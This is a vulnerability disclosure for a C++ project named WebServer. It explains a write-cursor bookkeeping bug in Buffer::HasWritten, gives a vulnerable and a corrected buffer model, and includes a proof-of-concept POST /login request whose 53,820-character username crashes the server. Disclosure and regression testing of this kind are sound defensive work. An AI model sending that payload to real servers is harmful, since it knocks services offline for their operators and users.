BUG_Author: s0l42
Affected Version: WebServer ≤ 1.0
Vendor: WebServer GitHub Repository
Software: WebServer
Vulnerability Files:
code/buffer/buffer.cpp
Arbitrary memory write found in code/buffer/buffer.cpp of WebServer ≤ 1.0: the method Buffer::HasWritten updates the written length incorrectly. In detail, it adds the length of the user input to writePos_ instead of adding the number of bytes actually written, so a user can use this incorrect design to control the address that is written next time, which results in an arbitrary memory write.
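The bookkeeping flaw described above, as an added C++ model that is not the project's code: VulnBuffer, SafeBuffer, Append, CursorInBounds and the helper names are assumptions for this demo, and the vulnerable variant only copies what fits so that the stale cursor can be inspected without an out-of-bounds write.

```cpp
#include <algorithm>
#include <cstring>
#include <string>
#include <vector>

// Model of the flaw: the cursor advances by the requested length,
// not by the number of bytes actually stored.
class VulnBuffer {
public:
    explicit VulnBuffer(size_t cap) : buf_(cap, 0), writePos_(0) {}
    size_t WritableBytes() const { return writePos_ < buf_.size() ? buf_.size() - writePos_ : 0; }
    void Append(const std::string& data) {
        size_t copied = std::min(data.size(), WritableBytes());
        if (copied) std::memcpy(&buf_[writePos_], data.data(), copied);
        HasWritten(data.size());  // BUG: requested length, not `copied`
    }
    void HasWritten(size_t len) { writePos_ += len; }
    size_t WritePos() const { return writePos_; }
    // True only while the next write would still land inside buf_.
    bool CursorInBounds() const { return writePos_ <= buf_.size(); }
private:
    std::vector<char> buf_;
    size_t writePos_;
};

// Corrected bookkeeping: make room first, then advance by the byte
// count that was really copied, clamped to the buffer end.
class SafeBuffer {
public:
    explicit SafeBuffer(size_t cap) : buf_(cap, 0), writePos_(0) {}
    void Append(const std::string& data) {
        if (data.empty()) return;
        if (buf_.size() - writePos_ < data.size()) buf_.resize(writePos_ + data.size());
        std::memcpy(&buf_[writePos_], data.data(), data.size());
        HasWritten(data.size());  // equals the bytes actually copied
    }
    void HasWritten(size_t len) { writePos_ += std::min(len, buf_.size() - writePos_); }
    size_t WritePos() const { return writePos_; }
    bool CursorInBounds() const { return writePos_ <= buf_.size(); }
private:
    std::vector<char> buf_;
    size_t writePos_;
};

// Feed each buffer an oversized field like the PoC's username and report
// whether the write cursor still points inside the backing store.
bool VulnCursorValidAfter(size_t cap, size_t n) { VulnBuffer b(cap); b.Append(std::string(n, 'a')); return b.CursorInBounds(); }
bool SafeCursorValidAfter(size_t cap, size_t n) { SafeBuffer b(cap); b.Append(std::string(n, 'a')); return b.CursorInBounds(); }
```

With a 1024-byte buffer and a 53820-byte field, the vulnerable cursor ends up far past the end while the corrected one stays valid, which is the condition a regression test for this bug should assert.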
To prove the vulnerability, we use the code in httprequest.cpp: HttpRequest::ParseFromUrlencoded_ receives user input and processes it, then uses LOG_DEBUG to write the information to the log file, and a DoS happens here. For details, see the Analysis part. (The same applies to the method ParsePost_: sometimes ParsePost_ causes the crash and sometimes ParseFromUrlencoded_ does; we found this is related to the length of the user input.)
The PoC is as follows; it causes a DoS (an illegal address access). The payload username='a'*53820 means that we input the character a 53820 times; because the page is limited, we write 'a'*53820 to represent it.
POST /login HTTP/1.1
Host: xxx
Content-Length: 53842
Cache-Control: max-age=0
Origin: xxxx
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: xxxx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: xxxx
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: keep-alive
username='a'*53820&password=1
If successful, the server crashes and exits. “段错误” means “Segmentation Fault”.
After we analysed the backtrace and debugged with gdb, an illegal address access was found. The instruction mov word ptr [rdi-2], dx was executed when rdx was 0xa, which caused the crash.